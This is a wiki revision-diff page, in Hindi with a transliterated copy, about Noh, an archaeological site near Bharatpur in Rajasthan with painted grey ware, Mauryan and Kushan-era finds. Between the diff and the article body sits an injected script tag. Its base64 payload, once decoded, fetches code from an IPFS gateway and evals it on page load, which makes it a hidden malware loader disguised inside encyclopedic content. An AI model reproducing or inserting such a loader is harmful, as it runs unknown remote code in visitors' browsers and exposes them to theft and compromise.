Difference between revisions of "नोह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खाली" to "ख़ाली")
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
*यह स्थल [[राजस्थान]] के भरतपुर ज़िले से 6 किलोमीटर दूर [[भरतपुर]]-[[आगरा]] मार्ग पर स्थित है।  
+
'''नोह''' [[राजस्थान]] के [[भरतपुर ज़िला|भरतपुर ज़िले]] से 6 किलोमीटर दूर [[भरतपुर]]-[[आगरा]] मार्ग पर स्थित है।  
*आर.सी. अग्रवाल के निर्देशन में नोह में राज्य सरकार के पुरातत्त्व एवं संग्रहालय विभाग द्वारा उत्खनन करवाया गया।  
+
*आर.सी. अग्रवाल के निर्देशन में नोह में राज्य सरकार के पुरातत्त्व एवं संग्रहालय विभाग द्वारा [[उत्खनन]] करवाया गया।  
 
*यहाँ से चित्रित धूसर मृद्भाण्ड संस्कृति के अवशेष मिले हैं।  
 
*यहाँ से चित्रित धूसर मृद्भाण्ड संस्कृति के अवशेष मिले हैं।  
*यहाँ से प्राप्त सामग्री में अलिखित [[ताँबा|ताँबे]] ढले सिक्के, मिट्टी की मूर्तियाँ, पत्थर व मिट्टी के मनके, ताँबे की [[चूड़ी|चूड़ियाँ]] व वलय तथा चक्की व [[चूल्हा|चूल्हे]] भी मिले हैं।  
+
*यहाँ से प्राप्त सामग्री में अलिखित [[ताँबा|ताँबे]] ढले सिक्के, मिट्टी की मूर्तियाँ, पत्थर व [[मिट्टी]] के मनके, ताँबे की [[चूड़ी|चूड़ियाँ]] व वलय तथा चक्की व [[चूल्हा|चूल्हे]] भी मिले हैं।  
 
*यहाँ के मृद्भाण्ड काफ़ी चमकीले हैं तथा [[धातु]] की तरह खनकते हैं।  
 
*यहाँ के मृद्भाण्ड काफ़ी चमकीले हैं तथा [[धातु]] की तरह खनकते हैं।  
 
*इस [[संस्कृति]] के लोगों को [[लोहा|लोहे]] का ज्ञान था।  
 
*इस [[संस्कृति]] के लोगों को [[लोहा|लोहे]] का ज्ञान था।  
 
*ताँबे की विभिन्न वस्तुएँ भी यहाँ से प्राप्त हुई हैं।  
 
*ताँबे की विभिन्न वस्तुएँ भी यहाँ से प्राप्त हुई हैं।  
*यहाँ से मौर्यकालीन मृण्मूर्तियाँ प्राप्त हुई हैं।  
+
*यहाँ से [[मौर्यकाल|मौर्यकालीन]] मृण्मूर्तियाँ प्राप्त हुई हैं।  
 
*इस काल में यहाँ के निवासी पक्की ईंटों के बने मकानों में रहते थे।  
 
*इस काल में यहाँ के निवासी पक्की ईंटों के बने मकानों में रहते थे।  
 
*नोह से मौर्य युगीन भवनों एवं नगर व्यवस्था का पर्याप्त ज्ञान होता है।  
 
*नोह से मौर्य युगीन भवनों एवं नगर व्यवस्था का पर्याप्त ज्ञान होता है।  
Line 19: Line 19:
 
*यहाँ से [[कुषाण]] नरेश हुविष्क एवं वासुदेव के सिक्के मिले हैं।  
 
*यहाँ से [[कुषाण]] नरेश हुविष्क एवं वासुदेव के सिक्के मिले हैं।  
  
{{प्रचार}}
 
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 27: Line 26:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के नगर}}
 
{{राजस्थान के नगर}}
[[Category:नया पन्ना]]
 
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 +
[[Category:राजस्थान के ऐतिहासिक नगर]]
 
[[Category:राजस्थान के नगर]]
 
[[Category:राजस्थान के नगर]]
[[Category:राजस्थान के ऐतिहासिक नगर]]
+
[[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__

Revision as of 08:16, 20 February 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

noh rajasthan ke bharatapur zile se 6 kilomitar door bharatapur-agara marg par sthit hai.

  • ar.si. agraval ke nirdeshan mean noh mean rajy sarakar ke puratattv evan sangrahalay vibhag dvara utkhanan karavaya gaya.
  • yahaan se chitrit dhoosar mridbhand sanskriti ke avashesh mile haian.
  • yahaan se prapt samagri mean alikhit taanbe dhale sikke, mitti ki moortiyaan, patthar v mitti ke manake, taanbe ki choo diyaan v valay tatha chakki v choolhe bhi mile haian.
  • yahaan ke mridbhand kafi chamakile haian tatha dhatu ki tarah khanakate haian.
  • is sanskriti ke logoan ko lohe ka jnan tha.
  • taanbe ki vibhinn vastuean bhi yahaan se prapt huee haian.
  • yahaan se mauryakalin mrinmoortiyaan prapt huee haian.
  • is kal mean yahaan ke nivasi pakki eeantoan ke bane makanoan mean rahate the.
  • noh se maury yugin bhavanoan evan nagar vyavastha ka paryapt jnan hota hai.
  • saphaee vyavastha ke lie mauryakalin nagaroan ke sadrish chakrakoopoan ke praman mile haian.
  • yahaan se lohe ke krishi sambandhi upakaran bhi prapt hue haian.
  • noh ka pancham kal shuang-kushan yug ki kala ka pratinidhitv karata hai.
  • is kal ki mrinmoortiyoan mean khali jagah nahian rahane di gayi hai balki phal-phool ukerakar bhar di gayi hai.
  • yahaan se prapt moortiyoan se yahaan ke nivasiyoan ke pahanave ka jnan hota hai.
  • ve samane do gaanthoan vali pag di evan dhoti pahanate the aur unake pairoan ke bich dhoti ka tikona chhor zamin ko chhoota tha.
  • yahaan se shuang yug ki anek yaksh-yakshaniyoan ki moortiyaan prapt huee haian.
  • yahaan se kushan naresh huvishk evan vasudev ke sikke mile haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh